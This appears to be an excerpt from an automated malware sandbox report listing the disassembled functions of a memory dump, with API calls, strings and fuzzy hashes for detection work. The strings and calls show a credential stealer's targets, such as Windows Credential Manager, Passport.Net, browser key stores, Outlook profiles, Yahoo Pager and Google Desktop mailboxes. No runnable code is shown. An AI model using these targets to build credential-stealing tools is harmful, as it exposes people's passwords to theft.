                                                                                              • DeleteFileA.KERNEL32(00000000), ref: 0040C1E7
                                                                                              Memory Dump Source
                                                                                              • Source File: 0000000D.00000002.2421630765.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_13_2_400000_wab.jbxd
                                                                                              Similarity
                                                                                              • API ID: FileTemp$ClipboardDeleteDirectoryErrorLastNameOpenPathWindows
                                                                                              • String ID:
                                                                                              • API String ID: 2014771361-0
                                                                                              • Opcode ID: 171ad759d1281e3ff1fcd56c2419c2c7234209d842af2eef4b8115ce05bff710
                                                                                              • Instruction ID: f62812a52b3c8d3971b783ccdfc9367edaf682a71d5855f6ec34303c2df0b61c
                                                                                              • Opcode Fuzzy Hash: 171ad759d1281e3ff1fcd56c2419c2c7234209d842af2eef4b8115ce05bff710
                                                                                              • Instruction Fuzzy Hash: 69115276600218ABDB609B61DCCDFCB77BC9F15705F0401B6B685E60A2EBB499848F68
                                                                                              Uniqueness

                                                                                              Uniqueness Score: -1.00%

                                                                                              Function 0040613B Relevance: 9.1, APIs: 4, Strings: 2, Instructions: 51COMMON
                                                                                              Download Yara Rule
                                                                                              APIs
                                                                                              • memcmp.MSVCRT ref: 00406151
                                                                                                • Part of subcall function 0040607F: memcmp.MSVCRT ref: 0040609D
                                                                                                • Part of subcall function 0040607F: memcpy.MSVCRT ref: 004060CC
                                                                                                • Part of subcall function 0040607F: memcpy.MSVCRT ref: 004060E1
                                                                                              • memcmp.MSVCRT ref: 0040617C
                                                                                              • memcmp.MSVCRT ref: 004061A4
                                                                                              • memcpy.MSVCRT ref: 004061C1
                                                                                              Strings
                                                                                              Memory Dump Source
                                                                                              • Source File: 0000000D.00000002.2421630765.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_13_2_400000_wab.jbxd
                                                                                              Similarity
                                                                                              • API ID: memcmp$memcpy
                                                                                              • String ID: global-salt$password-check
                                                                                              • API String ID: 231171946-3927197501
                                                                                              • Opcode ID: 74ab0d982855b40a28d8c39abb951e864b1d3e85596098a6ddf56586a45c45d9
                                                                                              • Instruction ID: a9589356fa14544f03300d4f181c1951213ca66e4b0bd31de1399f3a3b520bb8
                                                                                              • Opcode Fuzzy Hash: 74ab0d982855b40a28d8c39abb951e864b1d3e85596098a6ddf56586a45c45d9
                                                                                              • Instruction Fuzzy Hash: BB01FC70A003446EEF212A128C02B4F37569F50769F014037FE0A782C3E67DD679864D
                                                                                              Uniqueness

                                                                                              Uniqueness Score: -1.00%

                                                                                              Function 00443473 Relevance: 9.0, APIs: 6, Instructions: 46COMMON
                                                                                              Download Yara Rule
                                                                                              APIs
                                                                                              Memory Dump Source
                                                                                              • Source File: 0000000D.00000002.2421630765.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_13_2_400000_wab.jbxd
                                                                                              Similarity
                                                                                              • API ID: ??3@
                                                                                              • String ID:
                                                                                              • API String ID: 613200358-0
                                                                                              • Opcode ID: 6ed48c83ccf18aed41f75d24fb527b0a1cda54e9eb8d05dcdcbff87325985d63
                                                                                              • Instruction ID: 2c47959068043e69134c65afad444586b1a09f576c08bcd621988c2a5a0f38ec
                                                                                              • Opcode Fuzzy Hash: 6ed48c83ccf18aed41f75d24fb527b0a1cda54e9eb8d05dcdcbff87325985d63
                                                                                              • Instruction Fuzzy Hash: 3C016272E46D7167E2167E326402B8FA358AF40F2BB16010FF80477682CB2CBE5045EE
                                                                                              Uniqueness

                                                                                              Uniqueness Score: -1.00%

                                                                                              Function 00401694 Relevance: 9.0, APIs: 6, Instructions: 44COMMON
                                                                                              Download Yara Rule
                                                                                              APIs
                                                                                              • GetClientRect.USER32(?,?), ref: 004016A3
                                                                                              • GetSystemMetrics.USER32(00000015), ref: 004016B1
                                                                                              • GetSystemMetrics.USER32(00000014), ref: 004016BD
                                                                                              • BeginPaint.USER32(?,?), ref: 004016D7
                                                                                              • DrawFrameControl.USER32(00000000,?,00000003,00000008), ref: 004016E6
                                                                                              • EndPaint.USER32(?,?), ref: 004016F3
                                                                                              Memory Dump Source
                                                                                              • Source File: 0000000D.00000002.2421630765.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_13_2_400000_wab.jbxd
                                                                                              Similarity
                                                                                              • API ID: MetricsPaintSystem$BeginClientControlDrawFrameRect
                                                                                              • String ID:
                                                                                              • API String ID: 19018683-0
                                                                                              • Opcode ID: 41a9f68717181b3a98dd3cb882205833d46fa89c93d8a9d4005197e1a3202613
                                                                                              • Instruction ID: cf01e476fd02228c824cf2568a7310e823bc3a91870265851f050ef0b1242b16
                                                                                              • Opcode Fuzzy Hash: 41a9f68717181b3a98dd3cb882205833d46fa89c93d8a9d4005197e1a3202613
                                                                                              • Instruction Fuzzy Hash: 81012C76900218AFDF44DFE4DC849EE7B79FB45301F040569EA11AA1A4DAB0A904CB50
                                                                                              Uniqueness

                                                                                              Uniqueness Score: -1.00%

                                                                                              Function 004063B2 Relevance: 8.9, APIs: 7, Instructions: 157COMMON
                                                                                              Download Yara Rule
                                                                                              APIs
                                                                                              • memset.MSVCRT ref: 0040644F
                                                                                              • memcpy.MSVCRT ref: 00406462
                                                                                              • memcpy.MSVCRT ref: 00406475
                                                                                                • Part of subcall function 00404888: memset.MSVCRT ref: 004048C2
                                                                                                • Part of subcall function 00404888: memset.MSVCRT ref: 004048D6
                                                                                                • Part of subcall function 00404888: memset.MSVCRT ref: 004048EA
                                                                                                • Part of subcall function 00404888: memcpy.MSVCRT ref: 004048FC
                                                                                                • Part of subcall function 00404888: memcpy.MSVCRT ref: 0040490E
                                                                                              • memcpy.MSVCRT ref: 004064B9
                                                                                              • memcpy.MSVCRT ref: 004064CC
                                                                                              • memcpy.MSVCRT ref: 004064F9
                                                                                              • memcpy.MSVCRT ref: 0040650E
                                                                                                • Part of subcall function 00406286: memcpy.MSVCRT ref: 004062B2
                                                                                              Memory Dump Source
                                                                                              • Source File: 0000000D.00000002.2421630765.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_13_2_400000_wab.jbxd
                                                                                              Similarity
                                                                                              • API ID: memcpy$memset
                                                                                              • String ID:
                                                                                              • API String ID: 438689982-0
                                                                                              • Opcode ID: d6e541f26a2e21c8c6d6048cbe16156117454f978ff945f7822072589e58f8d2
                                                                                              • Instruction ID: e4a864fa4e69ec142fe4fd7b7713e32d962165e503c4b70a0fc0dcfbb4c29d3a
                                                                                              • Opcode Fuzzy Hash: d6e541f26a2e21c8c6d6048cbe16156117454f978ff945f7822072589e58f8d2
                                                                                              • Instruction Fuzzy Hash: 41415FB290054DBEEB51DAE9CC41EEFBB7CAB48344F004476F708F7151E634AA498BA5
                                                                                              Uniqueness

                                                                                              Uniqueness Score: -1.00%

                                                                                              Function 0040F6E2 Relevance: 8.8, APIs: 4, Strings: 1, Instructions: 97stringCOMMON
                                                                                              Download Yara Rule
                                                                                              APIs
                                                                                                • Part of subcall function 0040466B: _mbscpy.MSVCRT ref: 004046BA
                                                                                                • Part of subcall function 004045DB: LoadLibraryA.KERNEL32(advapi32.dll,?,0040F708,?,00000000), ref: 004045E8
                                                                                                • Part of subcall function 004045DB: GetProcAddress.KERNEL32(00000000,CredReadA), ref: 00404601
                                                                                                • Part of subcall function 004045DB: GetProcAddress.KERNEL32(?,CredFree), ref: 0040460D
                                                                                                • Part of subcall function 004045DB: GetProcAddress.KERNEL32(?,CredDeleteA), ref: 00404619
                                                                                                • Part of subcall function 004045DB: GetProcAddress.KERNEL32(?,CredEnumerateA), ref: 00404625
                                                                                                • Part of subcall function 004045DB: GetProcAddress.KERNEL32(?,CredEnumerateW), ref: 00404631
                                                                                                • Part of subcall function 00404734: LoadLibraryA.KERNELBASE(?,0040F715,?,00000000), ref: 0040473C
                                                                                                • Part of subcall function 00404734: GetProcAddress.KERNEL32(00000000,?), ref: 00404754
                                                                                              • WideCharToMultiByte.KERNEL32(00000000,00000000,00000000,?,00000100,000000FF,00000000,00000000,?,?,?,?,00000000), ref: 0040F7AE
                                                                                              • strlen.MSVCRT ref: 0040F7BE
                                                                                              • _mbscpy.MSVCRT ref: 0040F7CF
                                                                                              • LocalFree.KERNEL32(00000000,?,00000000), ref: 0040F7DC
                                                                                              Strings
                                                                                              Memory Dump Source
                                                                                              • Source File: 0000000D.00000002.2421630765.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_13_2_400000_wab.jbxd
                                                                                              Similarity
                                                                                              • API ID: AddressProc$LibraryLoad_mbscpy$ByteCharFreeLocalMultiWidestrlen
                                                                                              • String ID: Passport.Net\*
                                                                                              • API String ID: 2329438634-3671122194
                                                                                              • Opcode ID: 0af64cc57546a9fbf77b674907fee208d195fdaa1b5113e78288b1972eb9facf
                                                                                              • Instruction ID: cbd5109d0b46f6ae46d16b49076c688dceaf9cc559dd015bf255ce3d8649dee3
                                                                                              • Opcode Fuzzy Hash: 0af64cc57546a9fbf77b674907fee208d195fdaa1b5113e78288b1972eb9facf
                                                                                              • Instruction Fuzzy Hash: 98316F76900109ABDB10EFA6DD45DAEB7B9EF89300F10007BE605F7291DB389A04CB59
                                                                                              Uniqueness

                                                                                              Uniqueness Score: -1.00%

                                                                                              Function 004032B7 Relevance: 8.8, APIs: 4, Strings: 1, Instructions: 82stringCOMMON
                                                                                              Download Yara Rule
                                                                                              APIs
                                                                                                • Part of subcall function 00403166: strchr.MSVCRT ref: 0040327B
                                                                                              • memset.MSVCRT ref: 0040330B
                                                                                              • GetPrivateProfileSectionA.KERNEL32(Personalities,?,000003FE,?), ref: 00403325
                                                                                              • strchr.MSVCRT ref: 0040335A
                                                                                                • Part of subcall function 004023E5: _mbsicmp.MSVCRT ref: 0040241D
                                                                                              • strlen.MSVCRT ref: 0040339C
                                                                                                • Part of subcall function 004023E5: _mbscmp.MSVCRT ref: 004023F9
                                                                                              Strings
                                                                                              Memory Dump Source
                                                                                              • Source File: 0000000D.00000002.2421630765.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_13_2_400000_wab.jbxd
                                                                                              Similarity
                                                                                              • API ID: strchr$PrivateProfileSection_mbscmp_mbsicmpmemsetstrlen
                                                                                              • String ID: Personalities
                                                                                              • API String ID: 2103853322-4287407858
                                                                                              • Opcode ID: bc8f70af08f30ec4db56d6fcc791bb65d74b30dbc9844da0e0792c070d737bbb
                                                                                              • Instruction ID: 7d10b282734f65fdb38f5d5bab0bdada953f1de7ece3d1168d652590bcd45cd6
                                                                                              • Opcode Fuzzy Hash: bc8f70af08f30ec4db56d6fcc791bb65d74b30dbc9844da0e0792c070d737bbb
                                                                                              • Instruction Fuzzy Hash: 6C21A872A041486AEB11EF699C81ADEBB7C9B51305F14007BFB04F7181DA7CDB46C66D
                                                                                              Uniqueness

                                                                                              Uniqueness Score: -1.00%

                                                                                              Function 00410863 Relevance: 8.8, APIs: 3, Strings: 2, Instructions: 54COMMON
                                                                                              Download Yara Rule
                                                                                              APIs
                                                                                              • UuidFromStringA.RPCRT4(5e7e8100-9138-11d1-945a-00c04fc308ff,?), ref: 0041087A
                                                                                              • UuidFromStringA.RPCRT4(00000000-0000-0000-0000-000000000000,?), ref: 00410887
                                                                                              • memcpy.MSVCRT ref: 004108C3
                                                                                              Strings
                                                                                              • 00000000-0000-0000-0000-000000000000, xrefs: 00410882
                                                                                              • 5e7e8100-9138-11d1-945a-00c04fc308ff, xrefs: 00410875
                                                                                              Memory Dump Source
                                                                                              • Source File: 0000000D.00000002.2421630765.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_13_2_400000_wab.jbxd
                                                                                              Similarity
                                                                                              • API ID: FromStringUuid$memcpy
                                                                                              • String ID: 00000000-0000-0000-0000-000000000000$5e7e8100-9138-11d1-945a-00c04fc308ff
                                                                                              • API String ID: 2859077140-3316789007
                                                                                              • Opcode ID: 1bd0dfdd33b944ccaa92fc0adafc19938dd855d0ba2d869dfbea71798e3d1944
                                                                                              • Instruction ID: 2d05171d55a2aa7530ad5e51965ca7b7e6a6868cf32f938cfe5ee3e9f977ce1c
                                                                                              • Opcode Fuzzy Hash: 1bd0dfdd33b944ccaa92fc0adafc19938dd855d0ba2d869dfbea71798e3d1944
                                                                                              • Instruction Fuzzy Hash: BD016D7690412DBADF01AE95CD40EEB7BACEF49354F044123FD15E6150E6B8EA84CBE4
                                                                                              Uniqueness

                                                                                              Uniqueness Score: -1.00%

                                                                                              Function 00444551 Relevance: 8.8, APIs: 2, Strings: 3, Instructions: 51registryCOMMON
                                                                                              Download Yara Rule
                                                                                              APIs
                                                                                              • memset.MSVCRT ref: 00444573
                                                                                                • Part of subcall function 00410A9C: RegOpenKeyExA.KERNELBASE(00401C4C,00401C4C,00000000,00020019,?,00401C4C,?,?,?), ref: 00410AAF
                                                                                                • Part of subcall function 00410ADD: RegQueryValueExA.ADVAPI32(?,?,00000000,?,00401C6A,?,?,?,?,00401C6A,?,?,?), ref: 00410AF8
                                                                                              • RegCloseKey.ADVAPI32(?,?,?,?,?,?,?,?,?,000003FF), ref: 004445DF
                                                                                              Strings
                                                                                              Memory Dump Source
                                                                                              • Source File: 0000000D.00000002.2421630765.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_13_2_400000_wab.jbxd
                                                                                              Similarity
                                                                                              • API ID: CloseOpenQueryValuememset
                                                                                              • String ID: EOptions string$Software\Yahoo\Pager$Yahoo! User ID
                                                                                              • API String ID: 1830152886-1703613266
                                                                                              • Opcode ID: baf3755ad005164e852b951840563bf60568ed10c800e15668adf960084471f0
                                                                                              • Instruction ID: e49b40feb516e52fd010a51085a75c79e183d02607987ed0dc43077d9115a6c0
                                                                                              • Opcode Fuzzy Hash: baf3755ad005164e852b951840563bf60568ed10c800e15668adf960084471f0
                                                                                              • Instruction Fuzzy Hash: E80196B6A00118BBEF11AA569D01F9A777CDF90355F1000A6FF08F2212E6749F599698
                                                                                              Uniqueness

                                                                                              Uniqueness Score: -1.00%

                                                                                              Function 0043D62C Relevance: 7.7, APIs: 4, Strings: 1, Instructions: 224COMMON
                                                                                              Download Yara Rule
                                                                                              APIs
                                                                                              Strings
                                                                                              Memory Dump Source
                                                                                              • Source File: 0000000D.00000002.2421630765.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_13_2_400000_wab.jbxd
                                                                                              Similarity
                                                                                              • API ID: memset
                                                                                              • String ID: H
                                                                                              • API String ID: 2221118986-2852464175
                                                                                              • Opcode ID: b7a38b27e5c8f908588e1f47af6482a11fcf8a0e9f714cd4a67b4b1e91083b9c
                                                                                              • Instruction ID: 41a1901620add3bbd0c629c105807ca0f7ae5b253a5bd6696a221ab72d79fc9a
                                                                                              • Opcode Fuzzy Hash: b7a38b27e5c8f908588e1f47af6482a11fcf8a0e9f714cd4a67b4b1e91083b9c
                                                                                              • Instruction Fuzzy Hash: C0916C75D00219DFDF24DFA5D881AEEB7B5FF48300F10849AE959AB201E734AA45CF98
                                                                                              Uniqueness

                                                                                              Uniqueness Score: -1.00%

                                                                                              Function 0042563B Relevance: 7.7, APIs: 2, Strings: 3, Instructions: 176COMMON
                                                                                              Download Yara Rule
                                                                                              APIs
                                                                                              Strings
                                                                                              Memory Dump Source
                                                                                              • Source File: 0000000D.00000002.2421630765.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_13_2_400000_wab.jbxd
                                                                                              Similarity
                                                                                              • API ID: memcpy
                                                                                              • String ID: out of memory$statement aborts at %d: [%s] %s$string or blob too big
                                                                                              • API String ID: 3510742995-3170954634
                                                                                              • Opcode ID: f23b84750750ded9f2ffe7c3d94913c2e203849674d50945dde1510e429b7173
                                                                                              • Instruction ID: e987c9c84479fff69dc62f11a90029b17cbd8b5ab9a96ddea988199e68ce63eb
                                                                                              • Opcode Fuzzy Hash: f23b84750750ded9f2ffe7c3d94913c2e203849674d50945dde1510e429b7173
                                                                                              • Instruction Fuzzy Hash: 2361C235B006259FCB04DF68E484BAEFBF1BF44314F55809AE904AB352D738E980CB98
                                                                                              Uniqueness

                                                                                              Uniqueness Score: -1.00%

                                                                                              Function 00414625 Relevance: 7.6, APIs: 3, Strings: 2, Instructions: 132COMMON
                                                                                              Download Yara Rule
                                                                                              APIs
                                                                                              Strings
                                                                                              Memory Dump Source
                                                                                              • Source File: 0000000D.00000002.2421630765.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_13_2_400000_wab.jbxd
                                                                                              Similarity
                                                                                              • API ID: memcpy$memset
                                                                                              • String ID: winWrite1$winWrite2
                                                                                              • API String ID: 438689982-3457389245
                                                                                              • Opcode ID: ce9cd4edfa8dbd859274d61cf42db9548f248045a44c52f6141926f4a5991765
                                                                                              • Instruction ID: c2532708ffcca3880dfc28061b61c902a2330187b6102c2a8a28e688d44e82e0
                                                                                              • Opcode Fuzzy Hash: ce9cd4edfa8dbd859274d61cf42db9548f248045a44c52f6141926f4a5991765
                                                                                              • Instruction Fuzzy Hash: 86418072A00209EBDF00DF95CC85BDE7775FF85315F14411AE924A7280D778EAA4CB99
                                                                                              Uniqueness

                                                                                              Uniqueness Score: -1.00%

                                                                                              Function 004144FD Relevance: 7.6, APIs: 4, Strings: 1, Instructions: 109COMMON
                                                                                              Download Yara Rule
                                                                                              APIs
                                                                                              Strings
                                                                                              Memory Dump Source
                                                                                              • Source File: 0000000D.00000002.2421630765.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_13_2_400000_wab.jbxd
                                                                                              Similarity
                                                                                              • API ID: memcpymemset
                                                                                              • String ID: winRead
                                                                                              • API String ID: 1297977491-2759563040
                                                                                              • Opcode ID: 514c1e3a0802e780418d6592697ed91d227734cf7519c01181e8c1f66eabfdc8
                                                                                              • Instruction ID: 3ec02e552038d814b148e8dc6d2e6fcfdb14063e9eab1ef980803e4d567ed084
                                                                                              • Opcode Fuzzy Hash: 514c1e3a0802e780418d6592697ed91d227734cf7519c01181e8c1f66eabfdc8
                                                                                              • Instruction Fuzzy Hash: DC31C372A00218ABDF10DF69CC46ADF776AEF84314F184026FE14DB241D334EE948BA9
                                                                                              Uniqueness

                                                                                              Uniqueness Score: -1.00%

                                                                                              Function 00449550 Relevance: 7.6, APIs: 4, Strings: 1, Instructions: 85COMMON
                                                                                              Download Yara Rule
                                                                                              APIs
                                                                                              Strings
                                                                                              Memory Dump Source
                                                                                              • Source File: 0000000D.00000002.2421630765.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_13_2_400000_wab.jbxd
                                                                                              Similarity
                                                                                              • API ID: memcpymemset
                                                                                              • String ID: gj
                                                                                              • API String ID: 1297977491-4203073231
                                                                                              • Opcode ID: 0d816628dddfc205dc81bb0cef5ba6c08625cdf510402cfd9794fe58c3b1b53e
                                                                                              • Instruction ID: 902d5c3a1247e7abcff0c4a84da7d54d3a467651d8a5431b25503c8ae0e770b6
                                                                                              • Opcode Fuzzy Hash: 0d816628dddfc205dc81bb0cef5ba6c08625cdf510402cfd9794fe58c3b1b53e
                                                                                              • Instruction Fuzzy Hash: AF216A733443402BF7259A3ACC41B5B775DDFCA318F16041EF68A8B342E67AEA058715
                                                                                              Uniqueness

                                                                                              Uniqueness Score: -1.00%

                                                                                              Function 004090B0 Relevance: 7.5, APIs: 5, Instructions: 49COMMON
                                                                                              Download Yara Rule
                                                                                              APIs
                                                                                              • GetParent.USER32(?), ref: 004090C2
                                                                                              • GetWindowRect.USER32(?,?), ref: 004090CF
                                                                                              • GetClientRect.USER32(00000000,?), ref: 004090DA
                                                                                              • MapWindowPoints.USER32(00000000,00000000,?,00000002), ref: 004090EA
                                                                                              • SetWindowPos.USER32(?,00000000,?,00000001,00000000,00000000,00000005), ref: 00409106
                                                                                              Memory Dump Source
                                                                                              • Source File: 0000000D.00000002.2421630765.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_13_2_400000_wab.jbxd
                                                                                              Similarity
                                                                                              • API ID: Window$Rect$ClientParentPoints
                                                                                              • String ID:
                                                                                              • API String ID: 4247780290-0
                                                                                              • Opcode ID: 0881872b442e91a884b62adcb4090c2e31bdfe9a46a4641592ad1aca8c145518
                                                                                              • Instruction ID: bdfce0b549e0f997c013470e25be1f804495b962c90005f3873202e4793523b9
                                                                                              • Opcode Fuzzy Hash: 0881872b442e91a884b62adcb4090c2e31bdfe9a46a4641592ad1aca8c145518
                                                                                              • Instruction Fuzzy Hash: 6A012D36801129BBDB119FA59C89EFFBFBCFF46750F044125FD05A2141D77455018BA5
                                                                                              Uniqueness

                                                                                              Uniqueness Score: -1.00%

                                                                                              Function 00410777 Relevance: 7.5, APIs: 5, Instructions: 40COMMON
                                                                                              Download Yara Rule
                                                                                              APIs
                                                                                                • Part of subcall function 00407107: memset.MSVCRT ref: 00407127
                                                                                                • Part of subcall function 00407107: GetClassNameA.USER32(?,00000000,000000FF), ref: 0040713A
                                                                                                • Part of subcall function 00407107: _strcmpi.MSVCRT ref: 0040714C
                                                                                              • SetBkMode.GDI32(?,00000001), ref: 0041079E
                                                                                              • GetSysColor.USER32(00000005), ref: 004107A6
                                                                                              • SetBkColor.GDI32(?,00000000), ref: 004107B0
                                                                                              • SetTextColor.GDI32(?,00C00000), ref: 004107BE
                                                                                              • GetSysColorBrush.USER32(00000005), ref: 004107C6
                                                                                              Memory Dump Source
                                                                                              • Source File: 0000000D.00000002.2421630765.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_13_2_400000_wab.jbxd
                                                                                              Similarity
                                                                                              • API ID: Color$BrushClassModeNameText_strcmpimemset
                                                                                              • String ID:
                                                                                              • API String ID: 2775283111-0
                                                                                              • Opcode ID: 30732ddb99e3546892e286b48803550164489c166bef4c71f88bf4e2e56830df
                                                                                              • Instruction ID: 687cb18978465a3feaaa07aa3b8de37e8775815fe2b8de28c5581ef0bdca0d30
                                                                                              • Opcode Fuzzy Hash: 30732ddb99e3546892e286b48803550164489c166bef4c71f88bf4e2e56830df
                                                                                              • Instruction Fuzzy Hash: AAF03135101109BBCF112FA5DC49ADE3F25EF05711F14812AFA25A85F1CBB5A990DF58
                                                                                              Uniqueness

                                                                                              Uniqueness Score: -1.00%

                                                                                              Function 0041479C Relevance: 7.1, APIs: 1, Strings: 3, Instructions: 96COMMON
                                                                                              Download Yara Rule
                                                                                              APIs
                                                                                              • __ehfuncinfo$??2@YAPAXIABUnothrow_t@std@@@Z.LIBCMT ref: 004147CE
                                                                                              Strings
                                                                                              Memory Dump Source
                                                                                              • Source File: 0000000D.00000002.2421630765.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_13_2_400000_wab.jbxd
                                                                                              Similarity
                                                                                              • API ID: Unothrow_t@std@@@__ehfuncinfo$??2@
                                                                                              • String ID: winSeekFile$winTruncate1$winTruncate2
                                                                                              • API String ID: 885266447-2471937615
                                                                                              • Opcode ID: 3989f365befeb7fb84bae78e7a4911c3188eb7aafc144da4ed62710c54f6e9f9
                                                                                              • Instruction ID: 76c2d8f9c45a6ab14154b13c081d04d7f34c1e3f6c53ca943db3ce1179081271
                                                                                              • Opcode Fuzzy Hash: 3989f365befeb7fb84bae78e7a4911c3188eb7aafc144da4ed62710c54f6e9f9
                                                                                              • Instruction Fuzzy Hash: 5C313175600700AFE720AF65CC41EABB7E8FB88715F104A2EF965932D1D734E8808B29
                                                                                              Uniqueness

                                                                                              Uniqueness Score: -1.00%

                                                                                              Function 0040E103 Relevance: 7.1, APIs: 3, Strings: 1, Instructions: 62COMMON
                                                                                              Download Yara Rule
                                                                                              APIs
                                                                                              Strings
                                                                                              Memory Dump Source
                                                                                              • Source File: 0000000D.00000002.2421630765.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_13_2_400000_wab.jbxd
                                                                                              Similarity
                                                                                              • API ID: _strcmpi$_mbscpy
                                                                                              • String ID: smtp
                                                                                              • API String ID: 2625860049-60245459
                                                                                              • Opcode ID: c45caa4284447f7f2e2e6364178d5851a287a2bec06db597c6e622e98960e237
                                                                                              • Instruction ID: 1dd5f7db1b4edf1a80ad81ce147274c535078e8a2a303909ef95c05f23963bac
                                                                                              • Opcode Fuzzy Hash: c45caa4284447f7f2e2e6364178d5851a287a2bec06db597c6e622e98960e237
                                                                                              • Instruction Fuzzy Hash: DB11C872500219ABEB10AB66CC41A8A7399EF40358F10453BE945F71C2EF39E9698B98
                                                                                              Uniqueness

                                                                                              Uniqueness Score: -1.00%

                                                                                              Function 0040821D Relevance: 7.1, APIs: 3, Strings: 1, Instructions: 61registryCOMMON
                                                                                              Download Yara Rule
                                                                                              APIs
                                                                                                • Part of subcall function 00410A9C: RegOpenKeyExA.KERNELBASE(00401C4C,00401C4C,00000000,00020019,?,00401C4C,?,?,?), ref: 00410AAF
                                                                                              • memset.MSVCRT ref: 00408258
                                                                                                • Part of subcall function 00410B62: RegEnumKeyExA.ADVAPI32(00000000,?,?,000000FF,00000000,00000000,00000000,?,?,00000000), ref: 00410B85
                                                                                              • RegCloseKey.ADVAPI32(?,?,?,?,?,?,?,?,?,?,?,00000000,000000FF,?,?,?), ref: 004082A6
                                                                                              • RegCloseKey.ADVAPI32(?,?,?,?,?,?,?,?,?,?,?,00000000,000000FF,?,?,?), ref: 004082C3
                                                                                              Strings
                                                                                              • Software\Google\Google Desktop\Mailboxes, xrefs: 00408230
                                                                                              Memory Dump Source
                                                                                              • Source File: 0000000D.00000002.2421630765.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_13_2_400000_wab.jbxd
                                                                                              Similarity
                                                                                              • API ID: Close$EnumOpenmemset
                                                                                              • String ID: Software\Google\Google Desktop\Mailboxes
                                                                                              • API String ID: 2255314230-2212045309
                                                                                              • Opcode ID: b9c6ba0a09f39c77023865a56f43d31249d27d4aeb116fb61def55debc704f1d
                                                                                              • Instruction ID: e7ff4aa50d33639bacb2d5000aefce928628a80d8311d3545e17288fa3d3d8ee
                                                                                              • Opcode Fuzzy Hash: b9c6ba0a09f39c77023865a56f43d31249d27d4aeb116fb61def55debc704f1d
                                                                                              • Instruction Fuzzy Hash: 9D118F72408345ABD710EE51DC01EABBBACEFD0344F04093EBD9491091EB75D958C6AA
                                                                                              Uniqueness

                                                                                              Uniqueness Score: -1.00%

                                                                                              Function 0040C26C Relevance: 7.0, APIs: 2, Strings: 2, Instructions: 43windowCOMMON
                                                                                              Download Yara Rule
                                                                                              APIs
                                                                                              • memset.MSVCRT ref: 0040C28C
                                                                                              • SetFocus.USER32(?,?), ref: 0040C314
                                                                                                • Part of subcall function 0040C256: PostMessageA.USER32(?,00000415,00000000,00000000), ref: 0040C265
                                                                                              Strings
                                                                                              Memory Dump Source
                                                                                              • Source File: 0000000D.00000002.2421630765.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_13_2_400000_wab.jbxd
                                                                                              Similarity
                                                                                              • API ID: FocusMessagePostmemset
                                                                                              • String ID: S_@$l
                                                                                              • API String ID: 3436799508-4018740455
                                                                                              • Opcode ID: f9fe39f7a068bdda1ebd36b4f409f4e20a0398a8366c16793ed62aa8fa7a4232
                                                                                              • Instruction ID: f4172cee4733ded4edf5c13384372fb960b3a31eee454cf66b40e3553cb76095
                                                                                              • Opcode Fuzzy Hash: f9fe39f7a068bdda1ebd36b4f409f4e20a0398a8366c16793ed62aa8fa7a4232
                                                                                              • Instruction Fuzzy Hash: 1411A172900158CBDF219B14CD457DE7BB9AF81308F0800F5E94C7B296C7B45A89CFA9
                                                                                              Uniqueness

                                                                                              Uniqueness Score: -1.00%

                                                                                              Function 0040929C Relevance: 7.0, APIs: 3, Strings: 1, Instructions: 37COMMON
                                                                                              Download Yara Rule
                                                                                              APIs
                                                                                              • memset.MSVCRT ref: 004092C0
